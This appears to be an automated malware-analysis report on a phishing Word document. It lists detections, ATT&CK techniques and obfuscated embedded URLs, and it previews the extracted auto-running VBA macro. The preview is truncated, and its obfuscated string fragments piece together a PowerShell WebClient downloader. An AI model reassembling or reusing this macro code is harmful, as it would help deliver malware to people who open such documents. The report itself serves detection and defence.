MALICIOUS
242
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro. The macro utilizes a Shell() call, indicating an attempt to execute external code. The ClamAV detection name 'Img.Dropper.PhishingLure-6443153-0' suggests a phishing lure that drops a payload. The embedded URLs are suspicious and likely point to the second-stage payload.
Heuristics 7
-
ClamAV: Img.Dropper.PhishingLure-6443153-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://so1Vab+VabtrantVab+VaSV62imcibVPzFPoB0G� In document text (OLE body)
- http://so1Vab+VabtrantVab+VaSV62imcibVPzFPoB0GIn document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 77721 bytes |
SHA-256: 075da81e42b77ac06e7ed1f7c9d18eced1cbe5a35521578647970faab104c157 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "nRaTaEMNjnLUMz"
Function pKRZnufRZ()
FfUZZuV = Array(UCase("aazGuiHiFwV" + "lOjzTJP" + "wINXKvDpX" + "kWmjEqMhjisWD" + "pNJsziUnDb"), UCase("RMawwfSLQLw" + "CKsmlakYc" + "qhwlKrt" + "zSLFmilkkz" + "LnMqvHhFriM"))
wYujJh = Mid("AMS2rSCSkoqXjPoFP8S2VMzbhuamvZn5MnjM", 24, 5)
wCsZsG = Array(UCase("wsPUkOFoZ" + "iwbCmiNWDjYFv" + "TrPYAiDiruKiCi" + "KDoXSkktWYqX" + "GcpszUBtz"), UCase("nukvGhsHfjls" + "jidKizszKHn" + "PEShhcrKWAc" + "pdMiQKodNzFJ" + "KSvHhdnwSr"))
rAhsZtvFrf = Array(UCase("DCMWtAMUa" + "uNjHwYOAB" + "lwQRiqBidmCnl" + "IDZHsjX" + "ztswKnKJqqj"), UCase("hElvsCziqo" + "HcjztwGIS" + "FwWYfjNTT" + "LGPSDRdPpkooKi" + "VioQLjiOCbGO"))
fiKsDTDpR = Array(UCase("wNPzNrTtrnBwtz" + "VcurpzpOvOUV" + "dqAOINFXiduC" + "VkRPAaNJhD" + "sozHzUj"), UCase("VjPBnmofsOnwA" + "QdEwfNuIawmtW" + "NwYNuBjoF" + "idMuUvuEGCYV" + "CpVzNJT"))
uFozaYAmAoz = Mid("4XUEBiARRl85+m85sVab+Vab);breaVab+VabkVab+Vab;}Vab+VabcaVm85+m85ab+VabtchVab+Vab{Vab+Vm85+m85abwritVam85+m85b+'+'VabeVab+m85+m85Vab-hostVab+Vab Vab+VabwbW_.ExceVab+Vabption.'+'MewU1662", 11, 168)
TQidQSlVM = Array(UCase("MWlPXsEBNN" + "cUrShiRosnKBZC" + "LcsMqzCG" + "TwZRRZj" + "QroqsQjY"), UCase("RWjCUMMO" + "bIAXzZOnzjFz" + "TDBlhORTML" + "ffjWAwmMCkzaH" + "sOcERzTKvCjAji"))
MJiMmdnmmX = Array(UCase("tQVSuqZEw" + "bYVSBBAn" + "BhnTusvVYZE" + "fmUlNrcaF" + "AHuwzhjnTz"), UCase("fRhFwaZwUBf" + "pwlAhoKXMZhjfZ" + "uNmkFGtzUnfQRC" + "kTVNFAMhCzJ" + "NFkAZXcfliQ"))
UivNfUEdww = Array(UCase("ZScwntXI" + "kzZSsXTcMSTU" + "zZhwZRtnFRlfbw" + "GKSkawdYq" + "slYnIjMrbT"), UCase("RoUGOvf" + "nmQbDWBAjuBV" + "qZjfVzw" + "ZoAcMpWziLAw" + "CmbKURHjczZzC"))
aaDBwjEp = Mid("jjKjCl8n.SpVab+Vablit(x1n,x1nVab+Vab);wbWkarapVab+Vabas = Vab+Vabwm85+m85bWVab+VabnVab+Vabsadasd.Vm85+m85ab+MPTUoN2P", 8, 101)
kYRldqFSG = Array(UCase("nwwQNBXtVko" + "LRUzijjlv" + "fukmFtoXqCD" + "ZIDvTBbQFcRXoI" + "iwEwiiH"), UCase("CjavdEzum" + "QrLtnMiK" + "bDcNzzqKalD" + "QSsBPtFwMH" + "iNYQrkJsQUzj"))
swTBiM = Array(UCase("OnatwiwOwQw" + "jiCFjAXKnmFUA" + "pDwraiKOIKDS" + "PsooKLi" + "ddXNYasnciFs"), UCase("tuSHqTjRV" + "CQwHSzzuJWzMa" + "dBESbjczaq" + "zVhUswSHlV" + "cSZoinwWQjUuio"))
MPrNl = Array(UCase("RIioZdJXYFLPY" + "nIdvCZkjjD" + "fwdwfnzHVp" + "oCkHiqfSBKKEL" + "EkqGIlbbPtijb"), UCase("SNIDfwUbLvvuAO" + "OVtRGbC" + "AMDQNmrd" + "PmznCHZPVcZvLO" + "MZBXkOUSQGHq"))
QwqKDzFmr = Mid("2LGp0oIab+VabSystVab+Vabem.Net.Vab+Vm85+m85abWVab+Vabem85+m85bClienVab+VabtVab+Vab;wbW'+'nsadaVab+VabsVab+VabdVab+Vab Vab+Vab=Vam85+m85b+Vm85+m85ab nVab+VabeVablS8dPjOJjbDsVVoGm9Ruq", 8, 153)
BpJtHRwTSzh = Array(UCase("NqpPEqFkU" + "QaRYiEoDjZl" + "nBoADZqdbDfck" + "RVQGWiFKNNf" + "mbfqzPdVDnaDmj"), UCase("qCNuonCnSmZCDm" + "obVFnOzkFQz" + "YdvNTqnOH" + "SrKkoNE" + "Naiazwijtj"))
cTqDVobjI = Array(UCase("fGoUSwfOPNM" + "UCkwcMpwS" + "nlTskuT" + "huQzkOnFdOiX" + "LoJPLkTnuSrJbT"), UCase("AZMlujj" + "zWSVLXibP" + "GcwKcYKAvmcZoI" + "kEDBzcRiWLttOI" + "LrbNVrHqw"))
tUwqQwhHBQ = Array(UCase("jcGDGfv" + "zTjpaqkNZ" + "jdJoGqTlFq" + "aitGiJjzKCtlT" + "UihSfpZMCmhs"), UCase("WQkUZEiXppishD" + "PUmrpFlMm" + "aBPNbHYpO" + "jahTjpLf" + "wawlLzizpDpkE"))
JWcobUZS = Mid("kv1Ts9C5Vab+'+'Vam85+m85bsm85+m85'+'sagVab+VabeVab+Va'+'b;}Vab+Vab}Vab).rePLAcE(V0VrZnR", 9, 73)
jFDrp = Array(UCase("bukuqYhKaaSiZ" + "Tozawjivr" + "akzbmEdOHNW" + "jkjnLjnhzjRJ" + "jtjsMJfCETFaGX"), UCase("zEXLvlHMtK" + "vHJitTojFK" + "VuEricQaMELSjs" + "GOJZhmho" + "XtWZmmaSL"))
DIpPrmPKdFU = Array(UCase("CzDOJNiKCStion" + "LztGXnsbQ" + "PtIimZZ" + "cfUcaBRGoYj" + "jIvfiDvijKKXn"), UCase("tUabQtUz" + "HziZroRw" + "vYXHwcEidu" + "RVwpQHzjNHmWhw" + "jwiEpPMqcOmmV"))
LUnjwRX = Array(UCase("czANXUt" + "XbwKREvcPwSCuN" + "zrKjrkkGOBcjnR" + "MoBmroPtRzDsj" + "znKPACVMoBO"), UCase("UiJpYHLajiBI" + "IiztjosBjP" + "RQmOSAAzY" + "Thkcbwh" + "qVlCssTY"))
QFLidim = Mi
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.